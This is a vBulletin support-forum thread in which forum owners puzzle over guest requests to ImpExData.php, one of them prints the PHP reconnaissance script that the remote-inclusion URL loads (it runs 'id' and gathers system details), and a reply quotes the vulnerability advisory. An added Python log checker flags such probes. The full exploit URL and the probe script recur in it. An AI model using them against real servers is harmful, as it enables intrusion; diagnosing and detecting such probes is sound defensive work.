Potential hack??

  • Potential hack??

    We have multiple guests trying to access a page that our "whosonline"
    states is unknown.

    It appears to be some sort of php redirect or info gathering.

    This is the link that it shows they are trying to access, yet that
    folder does not exist on our server, but when clicked, it goes to what
    appears to be one of our pages.. very odd. We locked the board. Can
    this do us harm?

    Link:
    http://www.barrelracingbuzz.com/thebuzz/index.php/impex/ImpExData.php?systempath=http://www.scv.co.kr/zboard/info.txt
    ???

    What's weird is that the above link looks almost like my board.. but doesn't. Some of the links are incorrect in the nav bar. It is really weird. It has my header and graphics.. but the navigation is different? WTF??

    Help! Thanks in advance!!

    Attached Files
    Last edited by Sheridan; Sun 4 Jan '09, 5:16pm.

  • #2
    Guest Unknown Location
    /thebuzz/index.php/impex/ImpExData.php?systempath=http:/www.scv.co.kr/zboard/info.txt
    host-198.247.172.4.gsinetblock.net

    Comment


    • #3
      I have the same thing on my forum. I was just going to ask the same question.

      Attached Files

      Comment


      • #4
        Has anyone figured out what this is about???? I have the same thing happening at my forum. But my version is 3.7.

        Gemma

        Comment


        • #5
          I am seriously freaked out? How can I have an UNKNOWN LOCATION on the board?? I don't have a folder on my server for any of this..

          Are they redirecting my site? It's like they are scanning my site page by page.. But I don't have an Impex page..

          I locked my board for a while... But unlocked and they are back... from Colorado, Korea, and Massachusetts..

          I just set my forum where unregistered guests cannot view the forum. It seems to have locked them out so far. But this is bad for business...

          Help!!
          Last edited by Sheridan; Sun 4 Jan '09, 5:57pm.

          Comment


          • #6
            I have kept my 3.7 board shut down for now until someone responds with an answer.

            Comment


            • #7
              You don't have impex installed, do you?
              It looks like they are just fishing.

              I see people looking for files all the time in my error log.
              ...steven
              www.318ti.org (vB3.8) | www.nccbmwcca.org (vB4.2)
              bmwcca.org/forum | m135i.net
              "I tried to clean this up but this thread is beyond redemption." - Steve Machol

              Comment


              • #8
                This is really weird. My board had the exact same thing, and I had like 7 "guests" having the same thing on the online page. I hopped on here to make a thread but I found this one. What exactly is this? Oh yeah, the unknown location is the exact same address as the picture first attached.

                Comment


                • #9
                  I started banning the ip addresses that are at the unknown locations.

                  Comment


                  • #10
                    I don't have a folder on my server that says Impex... so I must not have it loaded..

                    I'm running 3.7.0

                    You are going to run out of banning room...lol..

                    Go disable guests from viewing the forum..

                    Comment


                    • #11
                      Originally posted by Sheridan
                      I don't have a folder on my server that says Impex... so I must not have it loaded..
                      Then I would not worry about it.

                      I'm running 3.7.0
                      I would upgrade to 3.7.4p1 regardless.

                      You are going to run out of banning room...lol..

                      Go disable guests from viewing the forum..
                      I don't think disabling guests won't do anything.

                      Personally, I would not be concerned.
                      ...steven

                      Comment


                      • #12
                        I went to http://www.scv.co.kr/zboard/info.txt which is part of the unknown path. This is what it says. Does any of this make any sense to you?

                        <?php
                        function ConvertBytes($number) {
                            $len = strlen($number);
                            if($len < 4) { return sprintf("%d b", $number); }
                            if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
                            if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
                            return sprintf("%0.2f Gb", $number/1024/1024/1024);
                        }
                        echo "Osirys<br>";
                        $un = @php_uname();
                        $id1 = system(id);
                        $pwd1 = @getcwd();
                        $free1= diskfreespace($pwd1);
                        $free = ConvertBytes(diskfreespace($pwd1));
                        if (!$free) {$free = 0;}
                        $all1= disk_total_space($pwd1);
                        $all = ConvertBytes(disk_total_space($pwd1));
                        if (!$all) {$all = 0;}
                        $used = ConvertBytes($all1-$free1);
                        $os = @PHP_OS;
                        echo "0sirys was here and also is a ****ing gay..<br>";
                        echo "uname -a: $un<br>";
                        echo "os: $os<br>";
                        echo "id: $id1<br>";
                        echo "free: $free<br>";
                        echo "used: $used<br>";
                        echo "total: $all<br>";
                        exit;

                        Comment


                        • #13
                          Doesn't make sense to me.. that's why I made this post..

                          But if you click on the link in your "whosonline" page that they are trying to access... your site will come up but it is not totally functional and it will have that odd address on the end of it.. It looks like the beginning of a redirect...

                          And after I disabled guests... I have a stop sign next to the guests and the page they are trying to view.. So did I lock em out or not??

                          I swear? Are there not any vBulletin folks out on a Sunday night?

                          Comment


                          • #14
                            http://xforce.iss.net/xforce/xfdb/25391

                            Reported: Mar 23, 2006
                            vBulletin ImpEx module ImpExData.php file include

                            impex-impexdata-file-include (25391)
                            Medium Risk
                            Description:
                            ImpEx could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the ImpExData.php script using the 'systempath' variable to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
                            Platforms Affected:
                            • Jelsoft Enterprises, ImpEx 1.74 and prior
                            • Jelsoft Enterprises, vBulletin 3.5.0 or later

                            Remedy:
                            Upgrade to the latest version of vBulletin (1.75 or later), available from the vBulletin Web site. See References.
                            Edit: You don't have ImpEx installed, so there is no danger.
                            ...steven

                            Comment
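
Added example (not written by any poster in this thread and not vBulletin code): a log check for the request pattern discussed above and described in the advisory quoted in post #14. It assumes Apache combined-format access logs and that the server runs the first `.php` segment of a path and passes the remainder as PATH_INFO; the log lines, client addresses and the `/old/` path are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (Apache combined format, documentation IP ranges).
SAMPLE_LOG = '''\
192.0.2.10 - - [04/Jan/2009:17:01:12 -0600] "GET /thebuzz/index.php/impex/ImpExData.php?systempath=http://www.scv.co.kr/zboard/info.txt HTTP/1.1" 200 48211 "-" "-"
198.51.100.7 - - [04/Jan/2009:17:02:40 -0600] "GET /thebuzz/impex/ImpExData.php?systempath=http:/www.scv.co.kr/zboard/info.txt HTTP/1.1" 404 312 "-" "-"
198.51.100.7 - - [04/Jan/2009:17:02:41 -0600] "GET /old/impex/ImpExData.php?systempath=http://www.scv.co.kr/zboard/info.txt HTTP/1.1" 200 17 "-" "-"
203.0.113.5 - - [04/Jan/2009:17:03:02 -0600] "GET /thebuzz/showthread.php?t=1234 HTTP/1.1" 200 30122 "-" "-"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# A parameter value that is itself a URL; post #2 shows "http:/" with a single slash.
REMOTE_RE = re.compile(r'^(?:https?|ftp):/{1,2}[^/]', re.IGNORECASE)


def split_script(path):
    """Assumed PATH_INFO rule: the first *.php segment is the script, the rest is extra path."""
    parts = path.split("/")
    for i, seg in enumerate(parts):
        if seg.lower().endswith(".php"):
            rest = parts[i + 1:]
            return "/".join(parts[:i + 1]), ("/" + "/".join(rest) if rest else "")
    return path, ""


def find_remote_include_probes(log_text):
    """Return one dict per request that passes a remote URL as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        script, path_info = split_script(url.path)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                # path-info: answered by `script`, the named file was never reached
                # not-found: the target script is absent, so this was a blind probe
                # review:    the target script exists and answered the request
                verdict = "path-info" if path_info else "not-found" if status == 404 else "review"
                hits.append({"client": client, "script": script, "param": name,
                             "remote": value, "status": status, "verdict": verdict})
    return hits


if __name__ == "__main__":
    print(*find_remote_include_probes(SAMPLE_LOG), sep="\n")
```

Only a `review` hit means a script at that path actually received the parameter; a `path-info` hit returns 200 because `index.php` answered, which is why a status-code check alone misreads it.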


                            • #15
                              Thank you...

                              I have 3.7.0.. so am I screwed?

                              Comment
